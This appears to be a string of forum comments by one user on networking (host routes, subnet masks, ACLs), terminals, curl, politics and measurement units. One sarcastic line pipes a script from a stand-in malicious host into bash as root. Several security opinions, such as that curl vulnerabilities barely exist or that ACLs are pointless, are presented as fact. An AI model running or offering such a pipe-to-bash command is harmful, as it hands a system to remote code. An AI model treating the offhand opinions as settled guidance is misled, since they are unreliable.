Seems novel. But from a security aspect, if OpenSSH has security vulnerability that allows an unauthenticated user to login, via whatever means, once you are in the system as a non-privileged user, you are now free to use the same vulnerability to get root.

Basically this exercise is like using two locks that have the same key to open them. If the same key opens them, then a weakness in one, is now a weakness in the other so why bother with two identical locks?

hahaah. Ok sure you win. Linux TTY’s are absolutely not terminals. Sure they are called terminals, they are for all intents and purposes modern-day terminals with a long and storied history that directly links them to terminals from the 70’s but since they aren’t a physical piece of hardware that electro-mechanically connects to a mainframe, obviously they aren’t really terminals and they should be be called something else.

Do you know what a terminal is?

When my calculator app in windows is suspended, but has locked 29 threads and is using 60megs of ram. Not that those two values are significant, but why is my caluclator-app “suspended” when I closed it a few days ago since the last time I used it? Shouldn’t it just be closed and not showing up at all.

I’m not a software developer, but I absolutely do coding and one of the standard questions I ask is what OS they run on official company approved laptops. Other then a shitty bank I worked at for a few years (bad idea, but at least I got a pension out of it), all of them allow windows, osx, and at least one flavor of linux. If they don’t allow that stuff, you should just turn down the offer anyway.

Layer3 decides where broadcasts stop (at the boundary between two networks, i.e. a router)

Layer2 is where broadcasts go.

This isn’t actually correct. An ip address assignment for a host with an IP requires both the address and the subnet mask. One cannot be assigned without the other. Even more strictly speaking the address by itself isn’t useful to the network stack except as a destination, and isn’t used anywhere in the network stack of the host. There is always a subnet mask, sometimes the mask is assumed to be /32 (255.255.255.255), sometimes /24, whatever. But whenever you are talking about assigning an ip address to any IP speaker, it must include the mask.

The routing table on every IP speaker will include at a minimum a single host-route. That is the IP of the system itself with a /32 mask and the configured interface of that IP. Whether it’s eth0, a bonded interface, a loopback etc.

Once you have that single host route, additional routes can be added as needed. These routes require an address, a subnet, and a next-hop. The next hop can be a directly attached interface, or an IP that the is reachable by another route in the host routing table.

If you have only a host route, as OP has, then the system has no network knowledge, so there are no reachable next hop IPs. So you would have to use a directly connected interface, like the OP did. Once you tell the system 192.168.0.0/24 is reachable through that interface, then any IP Packets that have that network as their destination will use that interface with a source of the one IP it has. In the case of two servers connected back to back, assuming the other server knows where the source of the packet came from, there is no problem sending traffic back.

So to answer the OPs question, there is no difference between one host route, then a static route pointing to an interface, and just a directly connected interface with your server IP on it. They are two different routes that may have different administrative distances, but assuming you aren’t doing anything exotic, for all intents and purposes they are the same.

If you are talking about layer2 concepts like broadcasts, the host-route configured server can still receive broadcasts, but only broadcasts with destination ip of 255.255.255.255, not scoped broadcasts like 192.168.0.255 since it will ignore all traffic that isn’t unscoped broadcast or a full match to it’s own IP address.

Dotted Decimal is just a human convention. IPs are just 32 bit numbers meaning binary digit, and octal, dotted decimal and Hex are all valid representations of that same number. Subnet masks work via binary math.

Almost every single thing you would use an IP address for, you can substitute dotted decimal for octal or hex representations.

Yes, as long as you never connect your TV to the internet, then it is for all intents and purposes a "dumb tv."

Right but if you want to start doing application level blocking, then the proper tool for the job is a stateful firewall and even better, a RADIUS/Kerberos system that authenticates every connection between servers.

Basically I use ACLs to prevent spoofing attacks from originating out of my network, and also to lock down the management plane of my network devices to specific subnets. In all other cases a stateful firewall should be used exclusively.

In any other case ACLs provide the illusion of security and create a huge amount of operational friction especially in a dynamic environment.

Only if you assume IP Addresses act as authentication for what that host is. But since they don't, I see ACLs as a security blanket.
I can change the IP of a server I control and bypass any ACL easily. If I have control of my network as well, then no ACL you apply can stop any of my servers from hitting whatever server you have allowed any of my servers to hit. So why not just allow my entire network block?

Network ACLs are my bane. Someone long ago decided we needed to "isolate" the network, so they put ACLs everywhere and so now 50% of my teams time is spend fucking with ACLs :/ It's awful.

The only thing you need to know about file acls is not to use them. Similar thing can be said for Network ACLs to be honest.

I'll admit i'm out of my depth about exactly how curl works on the local system, but surely if there is a vulnerability in the "libcurl" library that is much more serious and severe then just saying "curl" is vulnerable.

I'm assuming that libcurl touches a huge amount of the linux network stack.

I don't see how a vulnerability in Curl can exist at all unless it's privilege escalation (you don't run curl as root do you?) And if it's not a privilege escalation, then it sounds like it's just a "root user can do things that you can do as root, possibly unintended" which isn't a vulnerability at all.

sudo curl www.badactor.ru/hackme | bash !!!

Which policy is that? Does it have a built in way to prevent accumlation of wealth? Maybe a death tax? Maybe some nationalizing of industry’s? No? Then it sounds like you are the one out of touch.

Oh no! Not the “auth-left.” They may make corporations exist for the good of the people instead of profit.

No what you aren’t getting is that the measurement units are arbitrary. However the divisors for those units is what makes the measurement system useful for people. If you are in construction it’s much more useful to deal with whole numbers then it is to deal with fractions. Hence if you want a third of a foot, you want 4", not .166666 of a Meter. If you are drinking beer you count by the number of glasses of beer whatever size those happen to be, you don’t count in Milliliters of beer. Measurements are supposed to be USEFUL to humans first and foremost, and moving a decimal to convert a unit to a different unit is trivial and can be done regardless of metric or not, and isn’t really useful.

A few nations have. The USSR, the US for Mars and Several nations have crashed things into the moon, unintentionally, including Israel and India. So maybe the problem wasn’t the metric system and something a lot more meaningful instead of what specific arbitrary unit of measurement you think is “better.”

e: Like look at this list: https://en.wikipedia.org/wiki/List_of_missions_to_Mars There are more failures then successes, and only one of those failures was because of different units used for two related measurements. It’s weird to even bring it up as a point about the metric system.

Decimals are absolutely not intuitive. Whole numbers are. If I say I have .473 liters of liquid how much is that? Sure it’s 473ml’s but how much is that? A lot a little? Could you drink that much? Should you drink that much? If I say, let’s go have a pint of beer, then you would obviously say, sure, maybe two. The amount is the same, but way you think about it is more important.

By the way, 8 pints of beer is gallon, so if you say I don’t want to drink a gallon of beer, you’ll know you should stop at 7 pints. But no one is going to say I can only drink 3.3liters of beer tonight. They may say, I promised my wife no more then 7beers (or 3 that number doesn’t matter), the point is you want to measure things in whole numbers for human-centric activities.